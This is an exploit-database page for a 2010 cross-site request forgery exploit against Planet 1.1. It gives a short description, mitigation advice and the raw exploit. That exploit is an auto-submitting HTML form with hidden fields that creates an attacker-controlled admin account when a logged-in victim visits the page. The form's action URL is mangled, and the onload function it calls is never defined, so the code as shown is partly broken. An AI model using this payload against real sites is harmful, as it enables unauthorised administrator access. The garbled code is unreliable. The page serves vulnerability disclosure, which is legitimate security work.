header-logo
Suggest Exploit
vendor:
Planet
by:
G0D-F4Th3r
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Planet
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:femtolayer:planet:1.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2010

Planet 1.1 – [CSRF] Add Admin Account

This exploit allows an attacker to add an admin account to the Planet 1.1 software. The attacker can craft a malicious HTML page with a form containing the username, password, email, mobile, site, location, and access values. When the victim visits the malicious page, the form is automatically submitted and the attacker's account is created.

Mitigation:

Implementing CSRF protection tokens, using same-site cookies, and using a Content Security Policy (CSP) are some of the ways to mitigate CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title: Planet 1.1 - [CSRF] Add Admin Account
# Date: 17-06-2010
# Author: G0D-F4Th3r
# Software Link: http://php.femtolayer.com/planet1_1/
# Version: 1.1
# Tested on: http://php.femtolayer.com/planet1_1/

##################################################################################
<html>
<body onload="javascript:fireForms()">

<form method="POST" name="form0"
action="http://www.site.com/[path]<http://www.site.com/%5Bpath%5D/admincp/staff.php?do=edit&id=1&go=update>
/cp/security.php?do=admins">
<input type="hidden" name="username" value="fuck"/>
<input type="hidden" name="password" value="fuckpass123"/>
<input type="hidden" name="pp" value=""/>
<input type="hidden" name="email" value="fuck@mail.com"/>
<input type="hidden" name="mobile" value="966555555555"/>
<input type="hidden" name="site" value="http://www.femtolayer.com"/>
<input type="hidden" name="location" value="US"/>
<input type="hidden" name="access" value="1"/>
</form>
</body>
</html>
###########################################################################
##############
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends
##################################################################################
#######

Navigation

Suggest Exploit

Services By CQR